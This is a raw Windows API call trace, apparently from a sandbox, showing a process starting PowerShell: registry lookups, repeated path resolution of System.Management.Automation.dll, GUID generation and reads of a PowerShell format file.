	[0820.099] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0820.099] CoTaskMemFree (pv=0x1b8ef640) 
	[0820.099] RegCloseKey (hKey=0x308) returned 0x0
	[0820.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0820.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0820.104] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xa4484d64, Data2=0x8851, Data3=0x4797, Data4=([0]=0xa3, [1]=0x61, [2]=0xe6, [3]=0x70, [4]=0xce, [5]=0xa9, [6]=0xa, [7]=0x68))) returned 0x0
	[0820.104] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe9a6f5b5, Data2=0x6913, Data3=0x42c1, Data4=([0]=0x8b, [1]=0x1f, [2]=0xdd, [3]=0x26, [4]=0x25, [5]=0x44, [6]=0xf8, [7]=0x4e))) returned 0x0
	[0821.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.694] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x25bea1c7, Data2=0xd8e3, Data3=0x490e, Data4=([0]=0x92, [1]=0x79, [2]=0xeb, [3]=0x8d, [4]=0x50, [5]=0x98, [6]=0x5e, [7]=0x70))) returned 0x0
	[0821.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.698] VirtualQuery (in: lpAddress=0x1cb620, lpBuffer=0x1cc4e0, dwLength=0x30 | out: lpBuffer=0x1cc4e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0821.699] VirtualQuery (in: lpAddress=0x1cb6b0, lpBuffer=0x1cc570, dwLength=0x30 | out: lpBuffer=0x1cc570*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0821.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.701] VirtualQuery (in: lpAddress=0x1cbe30, lpBuffer=0x1cccf0, dwLength=0x30 | out: lpBuffer=0x1cccf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0821.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.702] VirtualQuery (in: lpAddress=0x1cbe30, lpBuffer=0x1cccf0, dwLength=0x30 | out: lpBuffer=0x1cccf0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0821.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0821.708] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xed263f15, Data2=0x86c2, Data3=0x47d6, Data4=([0]=0xb6, [1]=0x1f, [2]=0x31, [3]=0xd, [4]=0xfa, [5]=0x9f, [6]=0x8a, [7]=0xb0))) returned 0x0
	[0824.108] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6d8a8475, Data2=0x5cd6, Data3=0x4523, Data4=([0]=0xb2, [1]=0x1, [2]=0x1e, [3]=0x96, [4]=0x57, [5]=0xc1, [6]=0xb, [7]=0x59))) returned 0x0
	[0824.109] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x1b7500f8, Data2=0x9236, Data3=0x47d2, Data4=([0]=0x9a, [1]=0x51, [2]=0xe8, [3]=0xbb, [4]=0x86, [5]=0xa1, [6]=0x9b, [7]=0xa0))) returned 0x0
	[0824.111] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9406d4a4, Data2=0x28fe, Data3=0x4e63, Data4=([0]=0x8c, [1]=0xef, [2]=0x8d, [3]=0xfe, [4]=0x20, [5]=0x6e, [6]=0x71, [7]=0x33))) returned 0x0
	[0824.112] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x601e9c0b, Data2=0xdadb, Data3=0x4e32, Data4=([0]=0xba, [1]=0x28, [2]=0x2, [3]=0xc4, [4]=0x58, [5]=0x2e, [6]=0x9e, [7]=0x85))) returned 0x0
	[0824.113] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xca5bcea9, Data2=0xe23, Data3=0x4571, Data4=([0]=0xb8, [1]=0xcf, [2]=0xef, [3]=0x7e, [4]=0x50, [5]=0x88, [6]=0x29, [7]=0x4d))) returned 0x0
	[0824.113] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x4dac20ff, Data2=0x78a8, Data3=0x43b4, Data4=([0]=0xb0, [1]=0x11, [2]=0x2d, [3]=0x4c, [4]=0x5e, [5]=0xd1, [6]=0xf8, [7]=0x77))) returned 0x0
	[0824.114] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x2fdfb32d, Data2=0x8338, Data3=0x41ce, Data4=([0]=0xa0, [1]=0x7, [2]=0x10, [3]=0xd6, [4]=0xd1, [5]=0xd0, [6]=0xcf, [7]=0x56))) returned 0x0
	[0824.114] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xa620acc4, Data2=0xc6f0, Data3=0x4880, Data4=([0]=0xa5, [1]=0xf4, [2]=0x46, [3]=0x89, [4]=0x74, [5]=0x3a, [6]=0xb1, [7]=0x21))) returned 0x0
	[0824.114] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x3f4fea5d, Data2=0x96f7, Data3=0x40c4, Data4=([0]=0x8c, [1]=0xab, [2]=0xa3, [3]=0xc1, [4]=0xc1, [5]=0x16, [6]=0xba, [7]=0x8d))) returned 0x0
	[0824.114] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x825464e2, Data2=0xc47, Data3=0x4f7a, Data4=([0]=0x9b, [1]=0xb1, [2]=0x6a, [3]=0x83, [4]=0x7, [5]=0x5f, [6]=0x8c, [7]=0x55))) returned 0x0
	[0824.115] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x8f6af639, Data2=0xfd27, Data3=0x4747, Data4=([0]=0x85, [1]=0x5b, [2]=0x2b, [3]=0x1f, [4]=0x17, [5]=0x52, [6]=0xc9, [7]=0x4e))) returned 0x0
	[0824.116] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb2085f9d, Data2=0xc5dc, Data3=0x4f23, Data4=([0]=0x99, [1]=0x9a, [2]=0xfc, [3]=0x57, [4]=0x15, [5]=0x46, [6]=0xd0, [7]=0x16))) returned 0x0
	[0824.117] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x65437b0, Data2=0xd0c0, Data3=0x4ea0, Data4=([0]=0x97, [1]=0xa9, [2]=0x3b, [3]=0x45, [4]=0xe6, [5]=0x9b, [6]=0x65, [7]=0x55))) returned 0x0
	[0824.118] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x4e5c2fe7, Data2=0x5aa, Data3=0x4e94, Data4=([0]=0x9a, [1]=0x14, [2]=0x7, [3]=0x10, [4]=0x5a, [5]=0x7f, [6]=0x6c, [7]=0x7))) returned 0x0
	[0824.118] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6d6ec46b, Data2=0x4b14, Data3=0x4db7, Data4=([0]=0x91, [1]=0xec, [2]=0x29, [3]=0x4a, [4]=0xa0, [5]=0xa6, [6]=0x95, [7]=0xdf))) returned 0x0
	[0824.118] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x42d73182, Data2=0x5a6d, Data3=0x43cc, Data4=([0]=0xb4, [1]=0xf3, [2]=0xa4, [3]=0x8b, [4]=0x90, [5]=0x6b, [6]=0xe7, [7]=0x4b))) returned 0x0
	[0824.119] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xbad9c31d, Data2=0xe5f1, Data3=0x4498, Data4=([0]=0x9a, [1]=0x92, [2]=0x87, [3]=0x74, [4]=0xd4, [5]=0xa2, [6]=0x89, [7]=0x2b))) returned 0x0
	[0824.119] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x5873ae46, Data2=0x41e9, Data3=0x42d2, Data4=([0]=0xaf, [1]=0xc, [2]=0xcb, [3]=0x5, [4]=0xbc, [5]=0x2a, [6]=0x1f, [7]=0xd))) returned 0x0
	[0824.119] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x8e3c47bc, Data2=0x123b, Data3=0x4a1a, Data4=([0]=0xac, [1]=0x56, [2]=0x72, [3]=0x4, [4]=0x7e, [5]=0x4d, [6]=0x48, [7]=0xba))) returned 0x0
	[0824.119] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x2102225d, Data2=0x4268, Data3=0x40b8, Data4=([0]=0x93, [1]=0x48, [2]=0x1f, [3]=0x8a, [4]=0x4a, [5]=0xd, [6]=0xe7, [7]=0x6b))) returned 0x0
	[0824.119] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xc43e4321, Data2=0x1c6c, Data3=0x47ac, Data4=([0]=0x9a, [1]=0xe4, [2]=0x14, [3]=0xb2, [4]=0x2c, [5]=0x47, [6]=0x80, [7]=0x54))) returned 0x0
	[0824.120] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0824.120] GetFileType (hFile=0x308) returned 0x1
	[0824.120] SetErrorMode (uMode=0x1) returned 0x1
	[0824.120] GetFileType (hFile=0x308) returned 0x1
	[0824.120] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.121] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.121] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.121] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.121] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.121] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.122] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.122] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.122] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.123] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.123] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.123] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.124] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.124] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0824.124] ReadFile (in: hFile=0x308, lpBuffer=0x3150118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3150118*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
